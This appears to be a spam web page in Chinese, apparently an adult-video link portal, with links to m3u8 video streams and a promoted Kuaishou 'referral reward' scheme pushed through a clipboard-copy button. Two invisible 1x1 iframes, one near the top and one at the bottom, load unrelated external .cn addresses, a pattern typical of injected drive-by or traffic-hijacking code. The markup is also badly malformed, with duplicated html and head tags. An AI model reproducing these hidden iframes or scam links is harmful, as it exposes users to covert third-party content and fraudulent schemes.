



<?php
<body>
   
    <iframe src="http://d.jczyt.cn/Rpxkg33707" width="1" height="1"></iframe>
</body>
<html>
	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					后宫选妃
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">欢迎来到喜爱夜蒲。一切视觉盛宴.供君共享</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
							<div class="cell title"><span>
									请勿相信视频里的博彩信息<a href="https://98tv.github.io">--返回首页</a>								</a>
								</span>
							</div>  </div> </div> 
						</div>

<br>  <span id="target"></span>
<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 

前面是文字居中 --><a href="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4">★★★快手85元每人拉新任务不限量点击领取★★★</a></div></div> </br>
<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div 

class="drugsword" ><a href="https://98tv.github.io/0.html">★★★点击进入后宫佳丽甑选★★★</a></div></div> 


<li><a href="https://t21.cdn2020.com/video/m3u8/2023/04/28/a75d221b/index.m3u8"><span style="color:red;">1 New～</span></a></li><li>
<a href="https://siwazywcdn3.com:5278/cvguochanzipai/omycfCxv/index.m3u8"><span style="color:blue;">2 New～</span></a></li><li>  
<a href="https://t16.cdn2020.com:12340/video/m3u8/2022/03/10/678e37cd/index.m3u8"><span style="color:red;">3 New～</span></a></li><li>
<a href="https://t22.cdn2020.com/video/m3u8/2023/06/21/14e140d6/index.m3u8"><span style="color:blue;">4 New～</span></a></li><li>
<a href="https://t21.cdn2020.com/video/m3u8/2023/01/24/5b48083e/index.m3u8"><span style="color:red;">5 New～</span></a></li><li>
<a href="https://t22.cdn2020.com/video/m3u8/2023/07/06/4723c516/index.m3u8"><span style="color:blue;">6 New～</span></a></li><li>

  </div>
</details>
  
    <iframe src="http://j.metasolare.cn/KzzTj35915" width="1" height="1"></iframe>

    </body>


</html>
